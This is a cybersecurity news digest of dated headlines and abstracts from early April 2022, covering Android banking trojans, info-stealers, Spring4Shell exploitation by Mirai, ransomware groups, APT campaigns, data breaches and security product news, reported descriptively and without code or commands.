Abstract A banking trojan for Android that researchers call Fakecalls comes with a powerful capability that enables it to take over calls to a bank's customer support number and connect the victim directly with the cybercriminals operating the malware.

BleepingComputer

April 11, 2022 – Business

HelpSystems acquires Terranova Security to offer security awareness solutions for businesses Full Text

Abstract HelpSystems announced the acquisition of Terranova Security, an organization providing phishing simulation, privacy awareness, and security awareness training services across the globe.

Help Net Security

April 11, 2022 – Government

Lawmakers ask Energy Department to take point on sector digital security Full Text

Abstract A bipartisan group of House and Senate lawmakers late last week urged the head of the U.S. Energy Department to take the lead in shaping the massive energy sector’s cybersecurity.

The Record

April 11, 2022 – General

Organizations must be doing something good: Payment fraud activity is declining Full Text

Abstract Results from an Association for Financial Professionals (AFP) survey are encouraging, as 71% of organizations report having been victims of payments fraud activity in 2021, lower than the 81% reported in 2019.

Help Net Security

April 11, 2022 – Malware

Fakecalls Banking Trojan Makes Fake Calls to Korean Bank Customers Full Text

Abstract Fakecalls mimics the mobile apps of popular Korean banks, among them KB (Kookmin Bank) and KakaoBank. Curiously, in addition to the usual logos, the Trojan’s creators display the support numbers of the respective banks on the Fakecalls screen.

Kaspersky Lab

April 11, 2022 – Breach

Over 300,000 People Impacted by Data Breach at SuperCare Health Full Text

Abstract In a data security notice posted on its website, SuperCare Health said the intrusion was discovered on July 27, 2021, when it noticed unauthorized activity on some systems.

Security Week

April 11, 2022 – Malware

Researchers warn of FFDroider and Lightning info-stealers targeting users in the wild Full Text

Abstract Cybersecurity researchers are warning of two different information-stealing malware, named  FFDroider  and  Lightning Stealer , that are capable of siphoning data and launching further attacks. "Designed to send stolen credentials and cookies to a Command & Control server, FFDroider disguises itself on victim's machines to look like the instant messaging application 'Telegram,'" Zscaler ThreatLabz researchers Avinash Kumar and Niraj Shivtarkar  said  in a report published last week. Information stealers, as the name implies, are equipped to harvest sensitive information from compromised machines, such as keystrokes, screenshots, files, saved passwords and cookies from web browsers, that are then transmitted to a remote attacker-controlled domain.  FFDroider is distributed through cracked versions of installers and freeware with the primary objective of stealing cookies and credentials associated with popular social media and e-commerce platforms and using

The Hacker News

April 11, 2022 – Solution

Microsoft’s Autopatch feature improves the patch management process Full Text

Abstract Microsoft announced a feature called Autopatch that will allow organizations to keep their systems up-to-date starting with Windows Enterprise E3 (July 2022). Microsoft recently announced the implementation of a new feature called Autopatch starting...

Security Affairs

April 11, 2022 – General

More organizations are paying the ransom. Why? Full Text

Abstract Most organizations (71%) have been hit by ransomware in 2022, and most of those (63%) opted for paying the requested ransom, the 2022 Cyberthreat Defense Report (CDR) by the CyberEdge Group has shown.

Help Net Security

April 11, 2022 – Solution

Dependency Review GitHub Action prevents adding known flaws in the code Full Text

Abstract Dependency Review GitHub Action scans users' pull requests for dependency changes and will raise an error if any new dependencies have existing flaws. GitHub announced Dependency Review GitHub Action which scans users' pull requests for dependency...

Security Affairs

April 11, 2022 – Solution

OpenSSH now defaults to protecting against quantum computer attacks Full Text

Abstract Post-quantum cryptography has arrived by default with the release of the new OpenSSH 9 version and the adoption of the hybrid Streamlined NTRU Prime + x25519 key exchange method.

ZDNet

April 11, 2022 – Vulnerabilities

Securing Easy Appointments and earning CVE-2022-0482 Full Text

Abstract Easy Appointments contained a very dangerous Broken Access Control vulnerability tracked as CVE-2022-0482 that was exposing PII. Another day, another threat to your data. The recently discovered CVE-2022-0482 is a Broken Access Control vulnerability...

Security Affairs

April 11, 2022 – Phishing

Eavesdropping scam: A new scam call tactic Full Text

Abstract Hiya has detected the newest scam call tactic, the eavesdropping scam. The new scam aims to get users to call back by leaving vague voicemail messages where an unknown voice is heard talking about the potential victim.

Help Net Security

April 11, 2022 – General

Accounts Deceivable: Email Scam Costliest Type of Cybercrime Full Text

Abstract The huge payoffs and low risks associated with BEC scams have attracted criminals worldwide. Some flaunt their ill-gotten riches on social media, posing in pictures next to Ferraris, Bentleys, and stacks of cash.

Security Week

April 11, 2022 – Vulnerabilities

Human activated risk still a pain point for organizations Full Text

Abstract Egress announced the results of a report, which revealed that 56% of IT leaders say that their non-technical staff is only ‘somewhat’ prepared, or ‘not at all’ prepared, for a security attack.

Help Net Security

April 11, 2022 – Botnet

Analyzing the Exploitation of Spring4Shell Vulnerability in Weaponizing and Executing the Mirai Botnet Malware Full Text

Abstract Trend Micro Threat Research observed active exploitation of the Spring4Shell vulnerability assigned as CVE-2022-22965, which allows malicious actors to weaponize and execute the Mirai botnet malware.

Trend Micro

April 10, 2022 – Malware

New Meta information stealer distributed in malspam campaign Full Text

Abstract Independent analyst Brand Duncan has spotted a malspam campaign delivering META, a new info-stealer malware that appears to be rising in popularity among cybercriminals.

BleepingComputer

April 10, 2022 – Solution

Microsoft’s New Autopatch Feature to Help Businesses Keep Their Systems Up-to-Date Full Text

Abstract Microsoft last week announced that it intends to make generally available a feature called Autopatch as part of Windows Enterprise E3 in July 2022. "This service will keep Windows and Office software on enrolled endpoints up-to-date automatically, at no additional cost,"  said  Lior Bela, senior product marketing manager at Microsoft, in a post last week. "The second Tuesday of every month will be 'just another Tuesday.'" Windows Autopatch is intended to work with all supported versions of Windows 10, Windows 11, and Windows 365 for Enterprise. Windows Server OS and Windows 365 for Business, however, are not supported. The tech giant said the feature is aimed at tackling the complexity associated with software updates in enterprise IT environments as well as closing security gaps introduced as a result of not applying patches in a timely fashion, thereby opening the door to potential new threats.  The managed service works by applying the updates acro

The Hacker News

April 10, 2022 – General

Apr 03 – Apr 09 Ukraine – Russia the silent cyber conflict Full Text

Abstract This post provides a timeline of the events related to the Russian invasion of Ukraine from the cyber security perspective. Below is the timeline of the events related to the ongoing invasion of Ukraine that occurred in the previous weeks: April...

Security Affairs

April 10, 2022 – Ransomware

NB65 group targets Russia with a modified version of Conti’s ransomware Full Text

Abstract NB65 hacking group created its ransomware based on the leaked source code of the Conti ransomware and targets Russia. According to BleepingComputer, NB65 hacking group is targeting Russian organizations with ransomware that they have developed using...

Security Affairs

April 10, 2022 – General

Security Affairs newsletter Round 360 by Pierluigi Paganini Full Text

Abstract A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here....

Security Affairs

April 10, 2022 – Hacker

Facebook blocked Russia and Belarus threat actors’ activity against Ukraine Full Text

Abstract Facebook/Meta said Russia-linked threat actors are attempting to use the social network against Ukraine with hate speech, bullying, and fake news. Facebook/Meta revealed that Russia-linked threat actors are attempting to weaponize the social network...

Security Affairs

April 09, 2022 – Attack

Hackers use Conti’s leaked ransomware to attack Russian companies Full Text

Abstract A hacking group used the Conti's leaked ransomware source code to create their own ransomware to use in cyberattacks against Russian organizations.

BleepingComputer

April 09, 2022 – Malware

New Android banking malware remotely takes control of your device Full Text

Abstract A new Android banking malware named Octo has appeared in the wild, featuring remote access capabilities that allow malicious operators to perform on-device fraud.

BleepingComputer

April 9, 2022 – Denial Of Service

A DDoS attack took down Finnish govt sites as Ukraine’s President addresses MPs Full Text

Abstract A massive DDoS attack took down Finnish government websites while Ukrainian President Zelenskyy addressed Finland's members of parliament (MPs). On April 8, a denial-of-service attack took down the websites of the Finnish ministries of Defense and Foreign...

Security Affairs

April 9, 2022 – Malware

SharkBot Banking Trojan spreads through fake AV apps on Google Play Full Text

Abstract Experts discovered malicious Android apps on the Google Play Store masqueraded as antivirus solutions spreading the SharkBot Trojan. Researchers from the Check Point Research (CPR) team discovered several malicious Android apps on the official Google...

Security Affairs

April 9, 2022 – Hacker

China-linked threat actors target Indian Power Grid organizations Full Text

Abstract China-linked threat actors continue to target Indian power grid organizations, most of the attacks involved the ShadowPad backdoor. Recorded Future's Insikt Group researchers uncovered a campaign conducted by a China-linked threat actor targeting...

Security Affairs

April 08, 2022 – Botnet

Hackers Exploiting Spring4Shell Vulnerability to Deploy Mirai Botnet Malware Full Text

Abstract The recently disclosed critical Spring4Shell vulnerability is being actively exploited by threat actors to execute the Mirai botnet malware , particularly in the Singapore region since the start of April 2022. "The exploitation allows threat actors to download the Mirai sample to the '/tmp' folder and execute them after permission change using 'chmod ,'" Trend Micro researchers Deep Patel, Nitesh Surana, Ashish Verma said in a report published Friday. Tracked as CVE-2022-22965 (CVSS score: 9.8), the vulnerability could allow malicious actors to achieve remote code execution in Spring Core applications under non-default circumstances, granting the attackers full control over the compromised devices. The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) earlier this week added the Spring4Shell vulnerability to its Known Exploited Vulnerabilities Catalog based on "evidence of active exploitation." This is

The Hacker News

April 08, 2022 – Breach

Snap-on discloses data breach claimed by Conti ransomware gang Full Text

Abstract American automotive tools manufacturer Snap-on announced a data breach exposing associate and franchisee data after the Conti ransomware gang began leaking the company's data in March.

BleepingComputer

April 8, 2022 – Criminals

Looking Inside Pandora’s Box Full Text

Abstract The threat group uses the double extortion method to increase pressure on the victim. This means that they not only encrypt the victim’s files, but also exfiltrate them and threaten to release the data if the victim does not pay.

Fortinet

April 08, 2022 – Hacker

Chinese Hacker Groups Continue to Target Indian Power Grid Assets Full Text

Abstract China-linked adversaries have been attributed to an ongoing onslaught against Indian power grid organizations, one year after a  concerted campaign  targeting critical infrastructure in the country came to light. Most of the intrusions involved a modular backdoor named  ShadowPad , according to Recorded Future's Insikt Group, a sophisticated remote access trojan which has been  dubbed  a "masterpiece of privately sold malware in Chinese espionage." "ShadowPad continues to be employed by an ever-increasing number of People's Liberation Army (PLA) and Ministry of State Security (MSS)-linked groups, with its origins linked to known MSS contractors first using the tool in their own operations and later likely acting as a digital quartermaster," the researchers  said . The goal of the sustained campaign, the cybersecurity company said, is to facilitate intelligence gathering pertaining to critical infrastructure systems in preparation for future contingency

The Hacker News

April 8, 2022 – General

15 Cybersecurity Measures for the Cloud Era Full Text

Abstract Which are the most important cybersecurity measures that businesses can take to protect themselves in the cloud era? We are now firmly in the era of cloud data and storage. In fact, it’s become quite difficult to find a service that doesn’t rely...

Security Affairs

April 08, 2022 – Solution

GitHub can now alert of supply-chain bugs in new dependencies Full Text

Abstract GitHub can now block and alert you of pull requests that introduce new dependencies impacted by known supply chain vulnerabilities.

BleepingComputer

April 8, 2022 – Business

Blockchain Security Firm CertiK Raises $88 Million at $2 Billion Valuation Full Text

Abstract The new investment round was led by Advent International, Insight Partners, and Tiger Global, with participation from Goldman Sachs and previous investors Lightspeed Venture Partners and Sequoia.

Security Week

April 08, 2022 – Ransomware

Researchers Connect BlackCat Ransomware with Past BlackMatter Malware Activity Full Text

Abstract Cybersecurity researchers have uncovered further links between BlackCat (aka AlphaV) and BlackMatter ransomware families, the former of which emerged as a replacement following international scrutiny last year. "At least some members of the new  BlackCat  group have links to the BlackMatter group, because they modified and reused a custom exfiltration tool [...] and which has only been observed in BlackMatter activity," Kaspersky researchers  said  in a new analysis. The tool, dubbed Fendr, has not only been upgraded to include more file types but also used by the gang extensively to steal data from corporate networks in December 2021 and January 2022 prior to encryption, in a popular tactic called double extortion. The findings come less than a month after Cisco Talos researchers  identified  overlaps in the tactics, techniques, and procedures (TTPs) between BlackCat and BlackMatter, describing the new ransomware variant as a case of "vertical business expansion.&q

The Hacker News

April 8, 2022 – Attack

Anonymous and the IT ARMY of Ukraine continue to target Russian entities Full Text

Abstract The popular hacking Anonymous and the IT ARMY of Ukraine continue to target Russian government entities and private businesses. This week Anonymous claimed to have hacked multiple private businesses and leaked their data through the DDoSecrets platform. The...

Security Affairs

April 08, 2022 – Malware

Mirai malware now delivered using Spring4Shell exploits Full Text

Abstract The Mirai malware is now leveraging the Spring4Shell exploit to infect vulnerable web servers and recruit them for DDoS (distributed denial of service) attacks.

BleepingComputer

April 8, 2022 – Outage

WonderHero Game Disabled After Hackers Steal $320,000 in Cryptocurrency Full Text

Abstract The operators of cryptocurrency play-to-earn game WonderHero have disabled the service after hackers stole about $320,000 worth of Binance Coin (BNB). The attack caused the price of WonderHero’s own coin, WND, to plummet more than 90%.

The Record

April 08, 2022 – Policy and Law

Ukrainian FIN7 Hacker Gets 5-Year Sentence in the United States Full Text

Abstract A 32-year-old Ukrainian national has been  sentenced to five years in prison  in the U.S. for the individual's criminal work as a "high-level hacker" in the financially motivated group FIN7. Denys Iarmak, who worked as a penetration tester for the cartel from November 2016 through November 2018, had been previously arrested in Bangkok, Thailand in November 2019, before being extradited to the U.S. in May 2020. In November 2021, Iarmak had pleaded guilty to one count of conspiracy to commit wire fraud and one count of conspiracy to commit computer hacking. FIN7 has been attributed to a number of attacks that have led to the theft of more than 20 million customer card records from over 6,500 individual point-of-sale terminals at more than 3,600 separate business locations in the U.S, costing the victims $1 billion in losses. The criminal gang, also known as Carbanak Group and the Navigator Group, has a track record of hitting restaurant, gambling, and hospitality indu

The Hacker News

April 8, 2022 – Policy and Law

A Ukrainian man is the third FIN7 member sentenced in the United States Full Text

Abstract A Ukrainian man was sentenced in the US to 5 years in prison for his criminal activity in the cybercrime group FIN7. Denys Iarmak, a Ukrainian national (32), has been sentenced to five years in prison in the U.S. for high-level hacking activity...

Security Affairs

April 08, 2022 – Vulnerabilities

Raspberry Pi removes default user to hinder brute-force attacks Full Text

Abstract An update to Raspberry Pi OS Bullseye has removed the default 'pi' user to make it harder for attackers to find and compromise Internet-exposed Raspberry Pi devices using default credentials.

BleepingComputer

April 8, 2022 – Attack

SaintBear Uses New Set of Payloads to Target Ukrainian Organizations Full Text

Abstract Researchers found the SaintBear actors targeting Ukrainian organizations using macro-embedded documents in its latest campaign that delivers different Elephant payloads. SaintBear has been actively performing cyberespionage campaigns aimed at Ukraine since 2021. For better protection, organizations ... Read More

Cyware Alerts - Hacker News

April 08, 2022 – Policy and Law

Microsoft Obtains Court Order to Take Down Domains Used to Target Ukraine Full Text

Abstract Microsoft on Thursday disclosed that it obtained a court order to take control of seven domains used by APT28, a state-sponsored group operated by Russia's military intelligence service, with the goal of neutralizing its attacks on Ukraine. "We have since re-directed these domains to a sinkhole controlled by Microsoft, enabling us to mitigate Strontium's current use of these domains and enable victim notifications," Tom Burt, Microsoft's corporate vice president of customer security and trust,  said . APT28, also known by the names Sofacy, Sednit, Pawn Storm, Fancy Bear, Iron Twilight, and Strontium, is a  cyber espionage group  and an advanced persistent threat that's known to be active since 2009, striking media, governments, military, and international non-governmental organizations (NGOs) that often have a security focus. The tech giant noted that the sinkholed infrastructure was used by the threat actor to target Ukrainian institutions as well as gov

The Hacker News

April 8, 2022 – APT

Microsoft disrupted APT28 attacks on Ukraine through a court order Full Text

Abstract Microsoft obtained a court order to take over seven domains used by the Russia-linked APT28 group to target Ukraine. Microsoft on Thursday announced it has obtained a court order to take over seven domains used by Russia-linked cyberespionage group...

Security Affairs

April 8, 2022 – Outage

Ransomware Forces North Carolina A&T University to Take Systems and Services Offline Full Text

Abstract North Carolina A&T State University, the largest historically black college in the US, University was recently struck by a ransomware Group called ALPHV, sending university staff into a scramble to restore services last month.

ARS Technica

April 8, 2022 – Attack

Hamas-linked threat actors target high-profile Israeli individuals Full Text

Abstract Hamas-linked threat actors conducted an elaborate campaign aimed at high-profile Israeli individuals employed in sensitive sectors. Researchers from Cybereason observed a sophisticated cyberespionage campaign conducted by APT-C-23 group campaigns...

Security Affairs

April 8, 2022 – Hacker

FIN7 Forays into Ransomware Attack Landscape with New Tools Full Text

Abstract Mandiant warned against the evil ambitions of the FIN7 group, which has shown strong signs of entering ransomware operations. The group’s presence has been reported before attack events from Maze, Darkside, BlackCat, and Ryuk. Recently, it has been observed showing off a novel backdoor and new mali ... Read More

Cyware Alerts - Hacker News

April 8, 2022 – Vulnerabilities

Command injection bug patched in Ruby library for converting AsciiDoc files Full Text

Abstract Developers have issued a patch for a popular Ruby library used to parse and convert AsciiDoc files, to safeguard servers against a newly discovered command injection vulnerability.

The Daily Swig

April 8, 2022 – Vulnerabilities

Researchers Discover Multiple Vulnerabilities in AutoDesk Products Full Text

Abstract Towards the end of 2021, Fortinet security researchers discovered and reported multiple zero-day vulnerabilities in AutoDesk products: DWG TrueView, Design Review, and Navisworks.

Fortinet

April 07, 2022 – Malware

New Octo Banking Trojan Spreading via Fake Apps on Google Play Store Full Text

Abstract A number of rogue Android apps that have been cumulatively installed from the official Google Play Store more than 50,000 times are being used to target banks and other financial entities. The rental banking trojan, dubbed  Octo , is said to be a rebrand of another Android malware called ExobotCompact, which, in turn, is a "lite" replacement for its Exobot predecessor, Dutch mobile security firm ThreatFabric  said  in a report shared with The Hacker News. Exobot is also likely said to have paved the way for a separate descendant called Coper, that was initially  discovered  targeting Colombian users around July 2021, with newer infections targeting Android users in different European Countries. "Coper malware apps are modular in design and include a multi-stage infection method and many defensive tactics to survive removal attempts," Cybersecurity company Cyble  noted  in an analysis of the malware last month. Like other Android banking trojans, the rogue apps

The Hacker News

April 07, 2022 – APT

Microsoft takes down APT28 domains used in attacks against Ukraine Full Text

Abstract Microsoft has successfully disrupted attacks against Ukrainian targets coordinated by the Russian APT28 hacking group after taking down seven domains used as attack infrastructure.

BleepingComputer

April 7, 2022 – Malware

The Mysterious Borat RAT is an All-In-One Threat Full Text

Abstract Cyble discovered a new RAT, dubbed Borat. With a builder, feature modules, and a server certificate, it offers ransomware and DDOS attack services. It is not known whether Borat is being sold or freely shared among cybercriminals. While analyzing the campaign and digging into its origin, a res ... Read More

Cyware Alerts - Hacker News

April 07, 2022 – Malware

First Malware Targeting AWS Lambda Serverless Platform Discovered Full Text

Abstract A first-of-its-kind malware targeting Amazon Web Services' (AWS) Lambda serverless computing platform has been discovered in the wild. Dubbed "Denonia" after the name of the domain it communicates with, "the malware uses newer address resolution techniques for command and control traffic to evade typical detection measures and virtual network access controls," Cado Labs researcher Matt Muir  said . The  artifact  analyzed by the cybersecurity company was uploaded to the VirusTotal database on February 25, 2022, sporting the name "python" and packaged as a 64-bit  ELF  executable. However, the filename is a misnomer, as Denonia is programmed in Go and harbors a customized variant of the XMRig cryptocurrency mining software. That said, the mode of initial access is unknown, although it's suspected it may have involved the compromise of AWS Access and Secret Keys. Another notable feature of the malware is its use of DNS over HTTPS ( DoH ) for c

The Hacker News

April 7, 2022 – Malware

Colibri Loader employs clever persistence mechanism Full Text

Abstract Recently discovered malware loader Colibri leverages a trivial and efficient persistence mechanism to deploy Windows Vidar data stealer. Malwarebytes researchers observed a new loader, dubbed Colibri, which has been used to deploy a Windows information...

Security Affairs

April 7, 2022 – Malware

MacOS Malware: Myth vs. Truth – Podcast Full Text

Abstract Huntress Labs R&D Director Jamie Levy busts the old “Macs don’t get viruses” myth and offers tips on how MacOS malware differs and how to protect against it.

Threatpost

April 07, 2022 – Policy and Law

FIN7 hacking group ‘pen tester’ sentenced to 5 years in prison Full Text

Abstract Denys Iarmak, a Ukrainian member and a "pen tester for the FIN7 financially-motivated hacking group, was sentenced on Thursday to 5 years in prison for breaching victims' networks and stealing credit card information for roughly two years, between November 2016 and November 2018.

BleepingComputer

April 7, 2022 – Vulnerabilities

Zero-Day Bugs Bug the Biggies Full Text

Abstract In the past few days, several attackers have been observed exploiting new zero-day vulnerabilities in commonly used software products by Google, Apple, and others. Apple has released emergency fixes for two zero-day flaws. Trend Micro fixed a high-severity vulnerability in its Apex Central. Meanwhi ... Read More

Cyware Alerts - Hacker News

April 07, 2022 – Attack

Hamas-linked Hackers Targeting High-Ranking Israelis Using ‘Catfish’ Lures Full Text

Abstract A threat actor with affiliations to the cyber warfare division of Hamas has been linked to an "elaborate campaign" targeting high-profile Israeli individuals employed in sensitive defense, law enforcement, and emergency services organizations. "The campaign operators use sophisticated social engineering techniques, ultimately aimed to deliver previously undocumented backdoors for Windows and Android devices," cybersecurity company Cybereason  said  in a Wednesday report. "The goal behind the attack was to extract sensitive information from the victims' devices for espionage purposes." The monthslong intrusions, codenamed " Operation Bearded Barbie ," have been attributed to an Arabic-speaking and politically-motivated group called Arid Viper, which operates out of the Middle East and is also known by the monikers APT-C-23 and Desert Falcon. Most recently, the threat actor was  held responsible  for attacks aimed at Palestinian activists

The Hacker News

April 7, 2022 – Vulnerabilities

CVE-2022-22292 flaw could allow hacking of Samsung Android devices Full Text

Abstract Experts discovered a vulnerability, tracked as CVE-2022-22292, which can be exploited to compromise Android 9, 10, 11, and 12 devices. Researchers from mobile cybersecurity firm Kryptowire discovered a vulnerability, tracked as CVE-2022-22292, in Android...

Security Affairs

April 07, 2022 – Solution

Google boosts Android security with new set of dev policy changes Full Text

Abstract Google has announced several key policy changes for Android application developers that will increase the security of users, Google Play, and the apps offered by the service.

BleepingComputer

April 7, 2022 – Privacy

New Spyware Actively Targets Android Users Full Text

Abstract An Android spyware impersonates a process manager app to target users and steal their data. While analyzing the spyware, the research team discovered that it downloads additional payloads to compromised devices. Organizations and users are suggested to always monitor and review the app permiss ... Read More

Cyware Alerts - Hacker News

April 07, 2022 – Breach

Into the Breach: Breaking Down 3 SaaS App Cyber Attacks in 2022 Full Text

Abstract During the last week of March, three major tech companies - Microsoft, Okta, and HubSpot - reported significant data breaches. DEV-0537, also known as LAPSUS$, performed the first two. This highly sophisticated group utilizes state-of-the-art attack vectors to great success. Meanwhile, the group behind the HubSpot breach was not disclosed. This blog will review the three breaches based on publicly disclosed information and suggest best practices to minimize the risk of such attacks succeeding against your organization.  HubSpot - Employee Access On March 21, 2022,  HubSpot reported the breach  which happened on March 18. Malicious actors compromised a HubSpot employee account that the employee used for customer support. This allowed malicious actors the ability to access and export contact data using the employee's access to several HubSpot accounts.  With little information regarding this breach, defending against an attack is challenging, but a key configuration within HubSpo

The Hacker News

April 7, 2022 – Vulnerabilities

CVE-2022-0778 OpenSSL flaw affects multiple Palo Alto devices Full Text

Abstract Palo Alto Networks plans to fix CVE-2022-0778 OpenSSL flaw in some of its firewall, VPN, and XDR, products during April 2022. In Mid March, OpenSSL released updates to address a high-severity denial-of-service (DoS) vulnerability, tracked as CVE-2022-0778,...

Security Affairs

April 07, 2022 – Malware

New malware targets serverless AWS Lambda with cryptominers Full Text

Abstract Security researchers have discovered the first malware specifically developed to target Amazon Web Services (AWS) Lambda cloud environments with cryptominers.

BleepingComputer

April 7, 2022 – Malware

Beastmode Powered With Newly Added Exploits Full Text

Abstract A Mirai variant called Beastmode was found exploiting disclosed vulnerabilities in TOTOLINK routers. Attackers abused five new exploits within a month. Beastmode has also added some older bugs for a variety of routers from different vendors, all rated 9.8 on the CVSS scale. TOTOLINK device users ar ... Read More

Cyware Alerts - Hacker News

April 07, 2022 – Malware

SharkBot Banking Trojan Resurfaces On Google Play Store Hidden Behind 7 New Apps Full Text

Abstract As many as seven malicious Android apps discovered on the Google Play Store masqueraded as antivirus solutions to deploy a banking trojan called SharkBot . "SharkBot steals credentials and banking information," Check Point researchers Alex Shamshur and Raman Ladutska  said  in a report shared with The Hacker News. "This malware implements a geofencing feature and evasion techniques, which makes it stand out from the rest of malwares." Particularly, the malware is designed to ignore users from China, India, Romania, Russia, Ukraine, and Belarus. The rogue apps are said to have been installed more than 15,000 times prior to their removal, with most of the victims located in Italy and the U.K. The report complements  previous findings  from NCC Group, which found the bankbot posing as antivirus apps to carry out unauthorized transactions via Automatic Transfer Systems (ATS). SharkBot takes advantage of Android's Accessibility Services permissions to present

The Hacker News

April 7, 2022 – Vulnerabilities

VMware addressed several critical vulnerabilities in multiple products Full Text

Abstract VMware fixed critical vulnerabilities in multiple products that could be exploited by remote attackers to execute arbitrary code. VMware has addressed critical remote code vulnerabilities in multiple products, including VMware’s Workspace ONE Access,...

Security Affairs

April 07, 2022 – Malware

Malicious web redirect service infects 16,500 sites to push malware Full Text

Abstract A new TDS (Traffic Direction System) operation called Parrot has emerged in the wild, having already infected servers hosting 16,500 websites of universities, local governments, adult content platforms, and personal blogs.

BleepingComputer

April 7, 2022 – Hacker

Deep Panda Uses Fire Chili Windows Rootkit Full Text

Abstract Deep Panda was found exploiting Log4Shell to deploy the new Fire Chili rootkit in compromised networks of organizations in the travel, finance, and cosmetic industries. Fire Chili helps keep file operations, registry key additions, processes, and malicious network connections concealed from the us ... Read More

Cyware Alerts - Hacker News

April 07, 2022 – Malware

Researchers Uncover How Colibri Malware Stays Persistent on Hacked Systems Full Text

Abstract Cybersecurity researchers have detailed a "simple but efficient" persistence mechanism adopted by a relatively nascent malware loader called Colibri , which has been observed deploying a Windows information stealer known as Vidar as part of a new campaign. "The attack starts with a malicious Word document deploying a Colibri bot that then delivers the Vidar Stealer," Malwarebytes Labs  said  in an analysis. "The document contacts a remote server at (securetunnel[.]co) to load a remote template named 'trkal0.dot' that contacts a malicious macro," the researchers added. First documented by  FR3D.HK  and Indian cybersecurity company CloudSEK earlier this year, Colibri is a malware-as-a-service (MaaS) platform that's engineered to drop additional payloads onto compromised systems. Early signs of the loader appeared on Russian underground forums in August 2021. "This loader has multiple techniques that help avoid detection," CloudSEK r

The Hacker News

April 07, 2022 – Attack

Bearded Barbie hackers catfish high ranking Israeli officials Full Text

Abstract The Hamas-backed hacking group tracked as 'APT-C-23' was found catfishing Israeli officials working in defense, law, enforcement, and government agencies, ultimately leading to the deployment of new malware.

BleepingComputer

April 7, 2022 – Hacker

A Bad Luck BlackCat Full Text

Abstract Kaspersky claims that at least some members of the new BlackCat group have links to the BlackMatter group, because they modified and reused a custom exfiltration tool we call Fendr and which has only been observed in BlackMatter activity.

Securelist

April 07, 2022 – Botnet

FBI Shut Down Russia-linked “Cyclops Blink” Botnet That Infected Thousands of Devices Full Text

Abstract The U.S. Department of Justice (DoJ) announced that it neutralized Cyclops Blink , a modular botnet controlled by a threat actor known as Sandworm, which has been attributed to the Main Intelligence Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). "The operation copied and removed malware from vulnerable internet-connected firewall devices that Sandworm used for command-and-control (C2) of the underlying botnet," the DoJ  said  in a statement Wednesday. In addition to disrupting its C2 infrastructure, the operation also closed the external management ports that the threat actor used to establish connections with the firewall appliances, effectively severing contact and preventing the hacking group from using the infected devices to commandeer the botnet. The March 22 court-authorized disruption of Cyclops Blink comes a little over a month after intelligence agencies in the U.K. and the U.S.  described  the botnet as a replacement fram

The Hacker News

April 07, 2022 – Malware

Android apps with 45 million installs used data harvesting SDK Full Text

Abstract Mobile malware analysts warn about a set of applications available on the Google Play Store, which collected sensitive user data from over 45 million devices.

BleepingComputer

April 7, 2022 – General

How many steps does it take for attackers to compromise critical assets? Full Text

Abstract The XM Cyber research team analyzed the methods, attack paths and impacts of attack techniques that imperil critical assets across on-prem, multi-cloud and hybrid environments.

Help Net Security

April 7, 2022 – Business

VPN Provider Nord Security Reaches Unicorn Status With $100 Million Funding Full Text

Abstract Lithuania-based Nord Security has raised $100 million in its first ever outside capital funding with a financing round led by Novator Ventures, and participation from Burda Principal Investments and General Catalyst.

Security Week

April 06, 2022 – Vulnerabilities

VMware Releases Critical Patches for New Vulnerabilities Affecting Multiple Products Full Text

Abstract VMware has released security updates to patch eight vulnerabilities spanning its products, some of which could be exploited to launch remote code execution attacks. Tracked from  CVE-2022-22954 to CVE-2022-22961  (CVSS scores: 5.3 - 9.8), the issues impact VMware Workspace ONE Access, VMware Identity Manager, VMware vRealize Automation, VMware Cloud Foundation, and vRealize Suite Lifecycle Manager. Five of the eight bugs are rated Critical, two are rated Important, and one is rated Moderate in severity. Credited with reporting all the vulnerabilities is Steven Seeley of Qihoo 360 Vulnerability Research Institute. The list of flaws is below - CVE-2022-22954  (CVSS score: 9.8) - Server-side template injection remote code execution vulnerability affecting VMware Workspace ONE Access and Identity Manager CVE-2022-22955 & CVE-2022-22956  (CVSS scores: 9.8) - OAuth2 ACS authentication bypass vulnerabilities in VMware Workspace ONE Access CVE-2022-22957 & CVE-2022-22958  (CVS

The Hacker News

April 06, 2022 – Vulnerabilities

Palo Alto Networks firewalls, VPNs vulnerable to OpenSSL bug Full Text

Abstract American cybersecurity company Palo Alto Networks warned customers on Wednesday that some of its firewall, VPN, and XDR products are vulnerable to a high severity OpenSSL infinite loop bug disclosed three weeks ago

BleepingComputer

April 6, 2022 – Malware

New Denonia Malware Targets AWS Lambda Environments Full Text

Abstract Lambda is a scalable compute service offered by Amazon Web Services (AWS) for running code, server and OS maintenance, capacity provisioning, logging, and operating numerous backend services.

ZDNet

April 06, 2022 – Education

Cyber Security WEBINAR — How to Ace Your InfoSec Board Deck Full Text

Abstract Communication is a vital skill for any leader at an organization, regardless of seniority. For security leaders, this goes double. Communicating clearly works on multiple levels. On the one hand, security leaders and CISOs must be able to communicate strategies clearly – instructions, incident response plans, and security policies. On the other, they must be able to communicate the importance of security and the value of having robust defenses to the C-level.  For CISOs and other security leaders, this latter skill is crucial but often overlooked or not prioritized. A new webinar: " How to ace your Infosec board deck ," looks to shed light on both the importance of being able to communicate clearly with management, and key strategies to do so effectively. The webinar will feature a conversation with vCISO and Cybersecurity Consultant Dr. Eric Cole, as well as Norwest Venture Partners General Partner Dave Zilberman.  More so than just talking about the dollar value of a sec

The Hacker News

April 6, 2022 – Botnet

US dismantled the Russia-linked Cyclops Blink botnet Full Text

Abstract The U.S. government announced the disruption of the Cyclops Blink botnet operated by the Russia-linked Sandworm APT group. The U.S. government announced that it had dismantled the Cyclops Blink botnet operated by the Russia-linked Sandworm APT group....

Security Affairs

April 6, 2022 – Phishing

Attackers Spoof WhatsApp Voice-Message Alerts to Steal Info Full Text

Abstract Threat actors target Office 365 and Google Workspace in a new campaign, which uses a legitimate domain associated with a road-safety center in Moscow to send messages.

Threatpost

April 06, 2022 – Malware

New FFDroider malware steals Facebook, Instagram, Twitter accounts Full Text

Abstract A new information stealer named FFDroider has emerged, stealing credentials and cookies stored in browsers to hijack victims' social media accounts.

BleepingComputer

April 6, 2022 – Breach

Texas Department of Insurance Exposed Data of 1.8 Million People Full Text

Abstract The exposed information includes names, addresses, phone numbers, dates of births, and partial or full social security numbers, as well as information about injuries and worker compensation claims.

Security Week

April 06, 2022 – Malware

